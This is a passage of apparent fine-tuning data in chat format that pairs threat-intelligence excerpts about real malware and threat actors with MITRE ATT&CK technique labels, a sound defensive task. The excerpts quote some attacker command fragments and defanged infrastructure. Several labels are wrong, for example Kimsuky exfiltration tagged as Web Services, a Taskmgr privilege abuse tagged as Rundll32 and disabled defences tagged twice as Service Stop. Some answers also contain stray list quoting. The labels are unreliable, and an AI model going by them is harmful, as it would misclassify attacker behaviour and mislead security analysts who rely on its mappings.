- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, the subsequent Diskcoder.C outbreak suggests that the attackers had access to the update server of the legitimate software. Using access to this server, attackers pushed a malicious update that was applied automatically without user interaction"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug obtained OS version and hardware configuration from a victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has encrypted configuration files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bad Rabbit’s \"infpub.dat\" file uses NTLM login credentials to brute force Windows machines."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used Rundll32 to execute its loader for privilege escalation purposes."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats used executables to download malicious files from different sources."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can execute various Windows commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link', 'T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot can install as a Windows service for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky employs a wide variety of malware such as Gold Dragon, Babyshark, Appleseed, etc. The module meant for exfiltrating files from the endpoint uses a distinct filepath list specified by the threat actors.Organizations must remain vigilant against motivated adversaries that conduct targeted attacks"
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will then resolve the current process’s PID and path to be used as script arguments, and proceeds to execute the script by running: /bin/sh -c ./update.sh <process_id> <process_path"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059 - Command and Scripting Interpreter', 'T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has collected valid email addresses that were subsequently used in spearphishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has the capability to list processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke takes periodic screenshots and exfiltrates them."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can execute supplied shell commands and uses bash scripts to perform additional actions."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then creates the following registry key to automatically run the Trojan each time the system starts: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@ The main behavior carried out by this Trojan involves obtaining an embedded executable, hollowing the current Trojan, writing the new embedded executable to the process memory and calling a specific function in the newly written payload"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information about network configuration, including the routing table, ARP cache, and DNS cache."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional Features The Zyklon malware offers the following additional capabilities (via plugins): Browser Password Recovery Zyklon HTTP can recover passwords from popular web browsers, including: Google Chrome Mozilla Firefox Internet Explorer Opera Browser Chrome Canary/SXS CoolNovo Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser FTP Password Recovery Zyklon currently supports FTP password recovery from the following FTP applications: FileZilla SmartFTP FlashFXP FTPCommander Dreamweaver WS_FTP Gaming Software Key Recovery Zyklon can recover PC Gaming software keys from the following games: Battlefield Call of Duty FIFA NFS Age of Empires Quake The Sims Half-Life IGI Star Wars Email Password Recovery Zyklon may also collect email passwords from following applications: Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail, Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager License Key Recovery The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kills anti-virus found on the victim."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When running on Windows 7, the malicious library uses the Metasploit Framework’s open-source code Win7Elevate to inject malicious code into explorer.exe"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE creates and uses a VBScript as part of its persistent execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy decodes its secondary payload and writes it to the victim’s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE)."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, command line tried to execute (iex is an alias for Invoke-Expression) the code downloaded from the IP address 104[.]168[.]237[.]21. Threat actors abused sslip.io for connection to C&C - a service that provides free IP to domain mapping to make SSL certificate generation easier for traffic encryption. While this service is legitimate and widely used, the malware abused it in an attempt at evading detection when connecting to C&C servers"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can gather AVs registered in the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK can use a DGA for Fallback Channels, domains are generated by concatenating words from lists."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has acquired web services for use in C2 and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cryptoistic can use TCP in communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command to transfer files from a remote host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several commands are supported by the Honeybee's implant via the command-line interface and there’s also a utility to execute any custom command on an infected endpoint."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can gather system information from the victim’s machine including the OS type."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can use the Internet Explorer (IE) COM interface to connect and receive commands from C2."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of network shares with the command \"net share\"."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enable/disable RDP connection and can start a remote desktop session using a browser web socket client."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete can download additional files for execution on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has used obfuscated VBA macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can use PowerShell to support multiple actions including execution and defense evasion."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 leveraged spearphishing emails with malicious links to initially compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has the ability to identify the computer name and OS version on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6: SpeakUp receives additional commands to execute, this time in plain text"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is launched through use of DLL search order hijacking to load a malicious dll."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The injected wermgr.exe process then creates a new folder in the user’s AppData directory. As typically seen in Trickbot infections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file (launcher.bat). "
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors, Windows Defender ATP provides rich, visualized technical context. In the screenshots below, Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk (Figure 5), loads the DLL using rundll32 (Figure 6), sets the DLL as a service (Figure 7), and saves a copy of itself in C:\\Windows\\Help (Figure 8"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the defense evasion phase, anti-malware and monitoring software is often disabled. Firewall rules have occasionally been seen being disabled as well."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop', 'T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1134.004 - Access Token Manipulation: Parent PID Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader scans processes to perform anti-VM checks."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper uses a function to obfuscate the name of functions and other parts of the malware."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT gathers the username from the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon ejection from the network, APT15 managed to regain access a couple of weeks later via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use backup C2 servers if the primary server fails."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Previous related research: https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1 https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/ https://www.sekoia.fr/blog/falling-on-muddywater/ Decoy images by country Jordan The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc Turkey Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc) Saudi Arabia Document signed by the Major General Pilot, commander of the Saudi Royal Air Force KSA King Saud University (KSU) KSA King Saud University (KSU) Azerbaijan İnkişaf üçün görüş.doc (meeting for development) Iraq Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers Pakistan ECP.doc National Assembly of Pakistan.doc P.Police.doc Afghanistan President.doc, E-government of Afghanistan Technical details Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware"
- },
- {
- "role": "assistant",
